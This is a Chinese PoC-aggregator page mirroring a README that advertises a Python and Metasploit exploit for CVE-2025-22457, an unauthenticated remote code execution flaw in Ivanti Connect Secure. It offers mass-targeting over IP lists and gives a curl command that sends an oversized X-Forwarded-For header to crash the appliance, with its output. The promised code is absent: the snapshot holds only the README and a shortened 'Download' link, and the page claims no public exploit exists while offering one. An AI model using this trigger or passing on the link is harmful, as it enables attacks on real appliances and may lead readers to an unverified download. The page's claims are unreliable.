POC详情: d7a13d7fb9d123e533c740d0a74fb7e7884a23b8

来源
https://github.com/N4SL1/CVE-2025-22457-PoC
关联漏洞
标题: Ivanti Connect Secure 安全漏洞 (CVE-2025-22457)
描述:Ivanti Connect Secure(ICS)是美国Ivanti公司的一款安全远程网络连接工具。 Ivanti Connect Secure存在安全漏洞,该漏洞源于栈缓冲区溢出,可能导致远程代码执行。
描述
CVE-2025-22457 Python and Metasploit PoC for Ivanti unauthenticated RCE
介绍
# CVE-2025-22457-PoC
CVE-2025-22457 Python and Metasploit PoC for Ivanti unauthenticated RCE

# CVE-2025-22457 A stack-based buffer overflow in Ivanti Connect Secure allows a remote unauthenticated attacker to achieve remote code execution.


PoC for achieving RCE in Ivanti Connect Secure Appliances<br>
PoC is both in Python and a metasploit module (more advanced payload for meterpreter)<br>
Python script is designed to work with a single ip and list of ips which can also save the results into a file<br>

Note: yet no public exploit is developed/disclosed and most probably it wont in near future cause of the impact.



# Download: [here](https://bit.ly/3EgljKT)


```
$ curl -v --insecure https://HOST --header X-Forwarded-For:A * 856
*   Trying HOST:443...
* Connected to HOST (HOST) port 443
* using HTTP/1.x
> GET / HTTP/1.1
> Host: HOST
> User-Agent: curl/8.10.1
> Accept: */*
> X-Forwarded-For:A * 856
>
* Request completely sent off
* schannel: server closed abruptly (missing close_notify)
* closing connection #0
curl: (56) Failure when receiving data from the peer
```
文件快照

 [4.0K]  /data/pocs/d7a13d7fb9d123e533c740d0a74fb7e7884a23b8
└── [1.1K]  README.md

0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。